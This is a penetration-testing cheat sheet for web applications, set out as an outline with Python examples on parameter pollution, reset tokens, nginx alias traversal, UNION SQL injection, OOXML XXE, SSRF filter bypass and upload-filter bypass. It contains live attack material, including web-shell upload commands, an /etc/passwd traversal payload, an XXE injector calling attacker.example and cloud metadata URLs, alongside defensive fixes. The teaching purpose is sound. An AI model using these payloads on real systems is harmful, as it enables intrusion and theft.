
Web Hacking and Recon


WEB HACKING

Cheat Sheets
  https://book.hacktricks.xyz
  https://github.com/swisskyrepo/PayloadsAllTheThings
  https://0xsp.com/

Tools
  https://gchq.github.io/CyberChef/
  https://lelinhtinh.github.io/de4js/
  https://xcat.readthedocs.io/en/latest/
  https://maxtoroq.github.io/xpath-ref/
  https://github.com/detectify/page-fetch
  OXML_XXE (https://github.com/BuffaloWill/oxml_xxe)
  https://github.com/wireghoul/htshells
  wpscan, Droopescan, CMSmap, CMSeeK, WPXF, joomscan, JoomlaVS, Drupwn

Reconnaissance

  Content Discovery
    Identify Web technology
      Wappalyzer

    Common filetypes
      html
      php
      aspx
      txt
      js
    feroxbuster / gobuster
    Review JavaScript Files
      https://lelinhtinh.github.io/de4js/
    Review HTML code
    Spiders
      gospider
    Identify directory and filename patterns
    Read metadata of files (PDF/Images) to identify Author, E-mails, Software used

  Subdomain Enumeration
    SSL certificates (Subject Alternative Names, certificate transparency logs)
    Google Dorks
    Bruteforce
      gobuster dns
      ffuf -H "Host: FUZZ.domain.com"
    amass

HTTP VERBS
  OPTIONS
  GET
  POST
  PUT
  DELETE
  MOVE
    curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
  PATCH
  INSERT (ARBITRARY VALUE)
  HELP
  Sending an arbitrary HTTP verb (INSERT, HELP, ...) might force the Web Server to disclose information.

Change Request Method
  Provide parameters in GET
  Change Content-Type
    JSON => XML
      https://codebeautify.org/xmltojson
      https://www.oxygenxml.com/xml_json_converter.html

HTTP Headers
  Common Headers
    X-Forwarded-For
    X-Real-IP
    X-Forwarded-Host
    X-Client-IP
    X-Forwarded-By
    X-Remote-Addr
    X-Remote-IP
    X-Wap-Profile: <URL-to-XML-file>
  Custom Headers
    BurpCollaboratorEverywhere (SSRF)
  Different User-Agent
    Windows
    Linux
    Android
    Custom Value (injection?)
  Duplicate Host Header
  Some implementations might parse HTTP Headers like "User-Agent" in an insecure manner
    Command Injection
    Shellshock
    SSRF
      BurpCollaboratorEverywhere
    SQLi
    Origin overwrite

HTTP Parameters
  ParamMiner
  HTTP Parameter Pollution
    id=1&id=2
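How `id=1&id=2` is read depends on the parser in front of it, and pollution becomes exploitable when two components of the same request path disagree. The following is an added example written for these notes (not code from any real application or tool): the front-end validator and back-end query are hypothetical, and the framework behaviours named in the docstrings are the documented defaults of those stacks.

```python
# Added example (not from the original notes): the same query string read three ways.
# Which occurrence of "id" an application uses depends on its parser, and a front end
# and back end that disagree is what makes parameter pollution exploitable.
from urllib.parse import parse_qs, parse_qsl


def first_value(query: str, name: str):
    """First occurrence wins (Flask/Werkzeug request.args.get, Java Servlet getParameter)."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == name:
            return value
    return None


def last_value(query: str, name: str):
    """Last occurrence wins (PHP $_GET, among others)."""
    value = None
    for key, v in parse_qsl(query, keep_blank_values=True):
        if key == name:
            value = v
    return value


def all_values(query: str, name: str):
    """Every occurrence as a list (urllib.parse.parse_qs; Express with the qs parser)."""
    return parse_qs(query, keep_blank_values=True).get(name, [])


def front_end_validates(query: str) -> bool:
    """Hypothetical WAF/front-end rule: 'id' must be numeric. It reads the first occurrence."""
    value = first_value(query, "id")
    return value is not None and value.isdigit()


def back_end_query(query: str) -> str:
    """Hypothetical back end that reads the last occurrence and concatenates it into SQL
    (deliberately injectable, to show what the front-end check was supposed to stop)."""
    return "SELECT * FROM users WHERE id = " + (last_value(query, "id") or "")


def polluted_request(query: str):
    """Returns (validator verdict, SQL the back end would run) for one request."""
    return front_end_validates(query), back_end_query(query)
```

The check to run during testing is the pair: if the validator passes `id=7&id=7 OR 1=1` while the back end builds its query from the last `id`, the filter is bypassed without touching the value it inspected.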

Password Reset
  User Enumeration
  Missing Rate Limiting
  Password Reset Poisoning via Host Header Injection
  Re-usable Password Reset Token
  No Expiration on Password Reset Token
  Guessable Password Reset Token
  IDN Homograph Attack
  Weak Password Policy
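Four of the items above (Host header poisoning, re-usable, non-expiring and guessable tokens) come down to two pieces of code: how the reset link is built and how the token is issued and redeemed. The block below is an added example written for these notes, not the code of any real application; `app.example.com`, the request headers and the `ResetTokens` class are constructed for illustration.

```python
# Added example (not code from the original notes or any real application): a reset link
# built from the Host header next to one that is not, plus token issuance that is
# unguessable, expiring and single-use. app.example.com and the request headers are
# constructed for illustration.
import hashlib
import secrets
import time

CANONICAL_HOST = "app.example.com"     # assumption: fixed server-side configuration


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """Uses the request's Host header to build the link: an attacker who requests a reset
    for the victim with Host: attacker.example gets the victim's token mailed inside a link
    under the attacker's domain."""
    host = headers.get("Host", CANONICAL_HOST)
    return f"https://{host}/reset?token={token}"


def hardened_reset_link(headers: dict, token: str):
    """Never echoes the Host header. A request whose Host is not the configured origin is
    refused (None) instead of being used; the link always points at the configured host."""
    if headers.get("Host", "").lower() != CANONICAL_HOST:
        return None
    return f"https://{CANONICAL_HOST}/reset?token={token}"


class ResetTokens:
    """Tokens are 256 bits from the OS CSPRNG, only their hash is stored, they expire after
    TTL seconds, and a successful redeem deletes them so the same token cannot be reused."""
    TTL = 15 * 60

    def __init__(self, now=time.time):
        self._now = now                  # injectable clock, so expiry can be demonstrated
        self._pending = {}               # sha256(token) -> (user, expires_at)

    def issue(self, user: str) -> str:
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[digest] = (user, self._now() + self.TTL)
        return token

    def redeem(self, token: str):
        """Returns the user the token was issued for, or None (unknown, reused or expired)."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.pop(digest, None)      # pop: single use
        if entry is None:
            return None
        user, expires_at = entry
        if self._now() > expires_at:
            return None
        return user
```

When testing a target, the same three properties are what to probe: send the reset request with a modified Host (and the X-Forwarded-Host variants listed under HTTP Headers) and see which host the mailed link carries, redeem one token twice, and redeem one after a long delay.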

Information Disclosure
  Generate an error
    Special characters
    HTTP Parameters
      Change type to array ( ?id= to ?id[]= )
      Missing parameters
      Parameter Pollution
    Non existing page => 404
    Very long session/cookies
  HTML code review
  JS code review
    Search for ".map" files
    https://lelinhtinh.github.io/de4js/

Path Traversal
  NGINX
    nginx.conf
    location /path misconfiguration (alias without a trailing slash on the location)
      vulnerable.site/path..%2f..%2f..%2f..%2fetc%2fpasswd
  Filter Bypass
    Unicode
      Codepoints: &#32;
    URL Encoding: %2e%2e%2f
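The nginx `location /path` misconfiguration is a prefix match: `location /path { alias /var/www/app/; }` also matches `/path../`, the prefix is swapped for the alias, and the remaining `../` walks out of the aliased directory. The block below is a simulation written for these notes (not nginx's own code) of that substitution rule; the config values, request URIs and file names are constructed. Real nginx also collapses dot-segments while normalising the URI before matching, so the multi-level encoded payload in the notes depends on encoding and version details; the single-level `/path../file` form is the reliable probe.

```python
# Added example (a simulation written for these notes, not nginx's own code): how a prefix
# "location" with "alias" and no trailing slash maps a request outside the aliased directory.
# The config values, request URIs and file names are constructed for illustration.
import posixpath
from urllib.parse import unquote


def resolve(location: str, alias: str, request_uri: str):
    """Prefix-location + alias semantics: the matched prefix is replaced by the alias and the
    remainder of the URI is appended as-is. Returns None when the location does not match."""
    uri = unquote(request_uri)                 # percent-decoding happens before matching
    if not uri.startswith(location):
        return None
    return posixpath.normpath(alias + uri[len(location):])


def escapes_alias(alias: str, resolved) -> bool:
    """True when the resolved path lies outside the alias directory."""
    if resolved is None:
        return False
    root = posixpath.normpath(alias)
    return not (resolved == root or resolved.startswith(root + "/"))


# Vulnerable: "location /path" also matches "/path../", so ".." lands right after the alias.
VULN = ("/path", "/var/www/app/")
# Hardened: "location /path/" requires the slash; "/path../" no longer matches this block.
SAFE = ("/path/", "/var/www/app/")


def check(config, request_uri: str):
    """Returns (resolved path or None, whether it escaped the alias directory)."""
    location, alias = config
    resolved = resolve(location, alias, request_uri)
    return resolved, escapes_alias(alias, resolved)
```

The fix is the trailing slash on both `location /path/` and `alias /var/www/app/` (or `root` instead of `alias` where the layout allows it); with the slash, `/path../` no longer matches the block and falls through to whatever handles unmatched URIs.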

Web Servers
  Apache
    /etc/apache2/apache2.conf
    /etc/apache2/envvars
    /etc/apache2/sites-enabled/000-default.conf
    /var/log/apache2/error.log
  NGINX
    /etc/nginx/nginx.conf
    /etc/nginx/locations.conf
    /etc/nginx/server.conf
    /etc/nginx/sites-enabled/default
  NodeJS
    var http = require('http');

LDAP Injection

XPATH Injection
  https://xcat.readthedocs.io/en/latest/
  https://maxtoroq.github.io/xpath-ref/

OS Command Injection

SQL Injection
  Identify number of columns
    UNION SELECT NULL, NULL, NULL, NULL; -- -
  Identify column data types and which columns are visible
  Identify Database type (MySQL, PostgreSQL, ...) and version
  sqlmap
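The three UNION steps above, carried out end to end, as an added example written for these notes: a deliberately string-concatenated query over an in-memory SQLite table (constructed data, not any real application), the probing loops an attacker or sqlmap would run, and the parameterised query that closes the hole. SQLite is dynamically typed, so the data-type part of step 2 cannot be shown here; on MySQL or PostgreSQL, substitute a string literal into one column at a time and watch for a type error.

```python
# Added example (constructed for these notes, not from any real application): the three
# UNION steps listed above run against an in-memory SQLite table behind a deliberately
# string-concatenated query, next to the parameterised query that closes the hole.
import sqlite3

SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, price REAL, secret TEXT);
INSERT INTO products VALUES (1, 'widget', 9.99, 'internal note');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_lookup(db, user_input: str):
    """The injectable query: input is concatenated, and only name and price reach the page."""
    sql = "SELECT name, price FROM products WHERE id = " + user_input
    return db.execute(sql).fetchall()


def union_payload(columns):
    # "-1" so no genuine row matches and only the UNIONed row comes back; "-- -" comments
    # out whatever follows the injection point
    return "-1 UNION SELECT " + ", ".join(columns) + "-- -"


def find_column_count(db, max_cols: int = 10):
    """Step 1: grow the NULL list until the database stops complaining about column counts."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(db, union_payload(["NULL"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    return None


def find_visible_columns(db, ncols: int):
    """Step 2: place a distinct marker in each column and note which markers are echoed."""
    visible = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'marker{i}'"
        rows = vulnerable_lookup(db, union_payload(cols))
        if any(f"marker{i}" in str(row) for row in rows):
            visible.append(i)
    return visible


def fingerprint(db, ncols: int, column: int):
    """Step 3: read the engine version through a visible column (sqlite_version() here;
    version() on PostgreSQL, @@version on MySQL and MSSQL)."""
    cols = ["NULL"] * ncols
    cols[column] = "sqlite_version()"
    return vulnerable_lookup(db, union_payload(cols))[0][column]


def safe_lookup(db, user_input: str):
    """The fix: a bound parameter, so the payload is only ever compared as a value."""
    return db.execute("SELECT name, price FROM products WHERE id = ?", (user_input,)).fetchall()
```

Note that the column count found is the number of columns in the vulnerable SELECT (two here), not the number of columns in the table (four); `secret` is never selected, which is why the next step after fingerprinting is reading other tables through the visible columns.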

NOSQL Injection

XML eXternal Entities (XXE)
  OOB (Out of Band)
    xxe.sh
  OXML_XXE (https://github.com/BuffaloWill/oxml_xxe)
    OOXML (DOCX, XLSX, PPTX), ODF, PDF, RSS
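An OOXML file is a zip of XML parts, which is why OXML_XXE works: a DOCTYPE with an external parameter entity is inserted into one part and fires when the server-side parser opens the document. The block below is an added example written for these notes, not OXML_XXE's code: it builds a minimal constructed .docx, plants an out-of-band payload pointing at a placeholder host (`attacker.example`, not a real callback server), and shows the inverse check an upload handler can run, since legitimate Office documents never carry a DOCTYPE or ENTITY declaration.

```python
# Added example: how a tool like OXML_XXE plants an out-of-band XXE payload inside an OOXML
# container, and the inverse check an upload handler can run. The .docx here is a minimal
# constructed archive, not a real document; attacker.example is a placeholder, not a real host.
import io
import re
import zipfile

MINIMAL_DOCX = {
    "[Content_Types].xml": '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
    "word/document.xml": '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>',
}

DOCTYPE_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def build_docx(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


def inject_oob_xxe(docx: bytes, callback_url: str, part: str = "word/document.xml") -> bytes:
    """Insert a DOCTYPE whose parameter entity loads an external DTD from callback_url.
    A parser that resolves external entities fetches it when the file is opened, which is
    the out-of-band signal; what the fetched DTD then does is the attacker's choice."""
    doctype = f'<!DOCTYPE x [<!ENTITY % remote SYSTEM "{callback_url}"> %remote;]>'
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx)) as src:
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
            for item in src.infolist():
                data = src.read(item.filename)
                if item.filename == part:
                    text = data.decode("utf-8")
                    # the XML declaration must stay first; the DOCTYPE goes right after it
                    decl_end = text.index("?>") + 2 if text.startswith("<?xml") else 0
                    data = (text[:decl_end] + doctype + text[decl_end:]).encode("utf-8")
                dst.writestr(item.filename, data)
    return out.getvalue()


def parts_with_dtd(docx: bytes):
    """Upload-side check: the XML parts carrying a DOCTYPE or ENTITY declaration.
    Office never writes one, so any hit is reason enough to reject the upload."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        for name in zf.namelist():
            if name.endswith((".xml", ".rels")) and DOCTYPE_RE.search(zf.read(name)):
                hits.append(name)
    return hits
```

The same injection applies to any part the server actually parses (`[Content_Types].xml`, `word/document.xml`, the `.rels` files), so the detection side has to scan every XML part of the archive, not just the document body; the parser itself should additionally run with external entity resolution disabled.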

File Inclusion (LFI/RFI)
  Wrappers
    phar://  (access archives)
    zlib://  (access archives)
    file://
    ogg://
    expect://
    glob://  (file pattern matching)
    data://
    php://
      php://filter/convert.base64-encode/resource=
  Log Poisoning
  Session Poisoning
  Interesting Files

Race Conditions (TOCTOU)

Template Injection (SSTI)
  Python
    Jinja2
  PHP
    Twig

Server Side Request Forgery (SSRF)
  gopher:// URL Scheme
  Filter Bypass
    127.0.0.1.nip.io
    localhost == [::]
    decimal notation 127.0.0.1 == 2130706433
    IPv6/IPv4 Embedding [0:0:0:0:0:ffff:127.0.0.1]
  Cloud
    AWS http://169.254.169.254/latest/meta-data
    Alibaba http://100.100.100.200/latest/meta-data/
    Oracle Cloud http://192.0.0.192/latest/meta-data/
    Digital Ocean http://169.254.169.254/metadata/v1.json
```
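Every bypass in the Filter Bypass list works against a filter that compares host strings. The block below is an added example written for these notes (the naive filter is a constructed strawman, the metadata addresses are the ones listed above, and `93.184.216.34` stands in for an arbitrary external host): it canonicalises the decimal, hex, bracketed IPv6 and IPv4-mapped spellings to one `ipaddress` object before deciding, and refuses non-HTTP schemes such as `gopher://` outright. Names that need DNS (`127.0.0.1.nip.io`) are refused in this example; a production filter resolves them, checks every returned address, and repeats the check after each redirect.

```python
# Added example (written for these notes; the naive filter is a constructed strawman and
# the addresses are the ones listed above): canonicalise the alternative spellings of an
# address before deciding whether a URL may be fetched server-side.
import ipaddress
from urllib.parse import urlsplit

DENIED_STRINGS = {"127.0.0.1", "localhost", "169.254.169.254"}

# Cloud metadata endpoints from the notes above, as networks, plus all of link-local
METADATA_NETWORKS = [
    ipaddress.ip_network("169.254.0.0/16"),       # AWS, DigitalOcean (and others)
    ipaddress.ip_network("100.100.100.200/32"),   # Alibaba
    ipaddress.ip_network("192.0.0.192/32"),       # Oracle Cloud
]


def naive_allows(url: str) -> bool:
    """String comparison on the hostname: every bypass above walks straight past it."""
    return urlsplit(url).hostname not in DENIED_STRINGS


def canonical_ip(host: str):
    """Turn dotted, bracketed IPv6, IPv4-mapped IPv6, decimal and hex spellings into one
    ipaddress object. Returns None for anything that needs DNS (127.0.0.1.nip.io and the
    like); a real filter resolves those, checks every returned address, and re-checks
    after each redirect."""
    host = host.strip("[]")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            n = int(host, 0)                       # "2130706433" or "0x7f000001"
        except ValueError:
            return None
        if not 0 <= n <= 0xFFFFFFFF:
            return None
        ip = ipaddress.IPv4Address(n)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                        # [::ffff:127.0.0.1] is 127.0.0.1
    return ip


def is_internal(ip) -> bool:
    return (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified
            or any(ip in net for net in METADATA_NETWORKS))


def hardened_allows(url: str) -> bool:
    """http(s) only (no gopher://, file://, dict://), literal addresses only in this example,
    and nothing that canonicalises to an internal or metadata address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    ip = canonical_ip(parts.hostname or "")
    return ip is not None and not is_internal(ip)
```

The explicit metadata networks are needed because `ipaddress` does not classify `100.100.100.200` (shared address space) or `192.0.0.192` as private; checking the notes' cloud endpoints by hand against whatever library the target uses is a good habit when reviewing an SSRF filter.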

Request Smuggling
  Smuggler

Insecure Deserialization
  Check all user controlled input (the application would need to deserialize untrusted user input)
    Cookies / Sessions
    HTTP Parameters
    HTTP Headers
    Remote Method Invocation (RMI)
  Python
    Pickle
    PyYAML load
  Java
    Magic Numbers "AC ED 00 05"
    Java-Deserialization-Cheat-Sheet
    ysoserial
    XMLDecoder
    XStream->fromXML
    ObjectInputStream
      ObjectInputStream->readExternal
      ObjectInputStream->readResolve
      ObjectInputStream->readObject
      ObjectInputStream->readUnshared
    Content-Type: application/x-java-serialized-object
  Ruby
    unmarshal
  PHP
    unserialize
    phpggc

Cross Site Scripting (XSS)

Same Origin Policy (SOP)

Cross Origin Resource Sharing (CORS)
  Check for Request Splitting
  Add CORS related HTTP Header to allow XSS

File Upload
  WebDAV
    cadaver
    davtest [-auth user:password] -move -sendbd auto -url http://<IP>
    curl -T file.txt http://<IP>
    HTTP MOVE
      curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
  web.config (ASP.NET)
    Make specific file extensions executable (e.g. execute txt files)
    https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
  .htaccess (Apache)
    Make specific file extensions executable (e.g. execute txt files)
    https://github.com/wireghoul/htshells
  Content-Type filter bypass
  Magic Bytes filter bypass
  Double Extensions filter bypass
  Alternative extensions blacklist filter bypass
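The four filter bypasses above, run against a typical blacklist filter and against an allow-list filter that withstands them. This is an added example written for these notes; the filters, file names and file bodies are made up, and the PHP stub is inert data that is never executed. The hardened filter assumes (as stated in its comment) that the caller stores the renamed file outside the web root in a directory with no script handler, which is what keeps a valid image carrying PHP inside it from ever being executed.

```python
# Added example (constructed for these notes; the filter, file names and bodies are made up
# and the PHP stub is never executed): the four bypasses above against a typical blacklist
# filter, and an allow-list filter that withstands them.
import posixpath
import secrets

BLACKLIST = {".php", ".asp", ".aspx", ".jsp"}                         # what the weak filter knows
MAGIC = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
PHP_STUB = b"<?php echo 'marker'; ?>"                                 # placeholder payload


def weak_filter(filename: str, content_type: str, body: bytes) -> bool:
    name = posixpath.basename(filename).lower()
    last_ext = name[name.rfind("."):] if "." in name else ""
    if last_ext in BLACKLIST:
        return False        # alternative extensions (.phtml, .php5, .phar) are not on the list
    if content_type.startswith("image/"):
        return True         # the client chose that header
    return any(body.startswith(m) for m in MAGIC.values())            # "GIF89a<?php ..."


def hardened_filter(filename: str, content_type: str, body: bytes):
    """Returns the server-chosen name to store under, or None. Content-Type is ignored."""
    parts = posixpath.basename(filename).lower().split(".")
    if len(parts) < 2:
        return None
    ext = "." + parts[-1]
    if ext not in MAGIC:
        return None                      # allow-list: .phtml, .php5, .phar never qualify
    if any("." + p in BLACKLIST for p in parts[1:-1]):
        return None                      # shell.php.jpg: stacked extensions are refused outright
    if not body.startswith(MAGIC[ext]):
        return None                      # the magic must match the claimed type
    # Random name, fixed extension: the caller stores it outside the web root in a directory
    # with no script handler (assumption of this example), so a polyglot stays inert data.
    return secrets.token_hex(16) + ext


CASES = {   # name: (filename, Content-Type, body)
    "alt-extension":    ("shell.phtml",   "application/octet-stream", b"GIF89a" + PHP_STUB),
    "double-extension": ("shell.php.jpg", "application/octet-stream", MAGIC[".jpg"] + PHP_STUB),
    "content-type":     ("shell.php.png", "image/png",                PHP_STUB),
    "magic-bytes":      ("shell.php5",    "text/plain",               b"GIF89a" + PHP_STUB),
    "real-image":       ("holiday.jpg",   "image/jpeg",               MAGIC[".jpg"] + b"\xe0JFIF"),
}


def run_cases():
    """name -> (weak filter accepts?, hardened filter accepts?)"""
    return {name: (weak_filter(*args), hardened_filter(*args) is not None)
            for name, args in CASES.items()}
```

Whether an accepted `shell.php.jpg` actually executes depends on the server: Apache with a `.php` handler registered via `AddHandler` treats every extension in the name, and the `.htaccess`/`web.config` tricks above are the same idea from the other direction, adding a handler for an extension the filter does allow. That is why the hardened version both refuses stacked extensions and discards the user's file name entirely.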

Prototype Pollution
  https://github.com/detectify/page-fetch

Content Management Systems (CMS)
  Wordpress
    wpscan
    Droopescan
    CMSmap
    CMSeeK
    WPXF
  Joomla
    joomscan
    Droopescan
    CMSmap
    CMSeeK
    JoomlaVS
  Drupal
    Droopescan
    CMSmap
    Drupwn
    CMSeeK
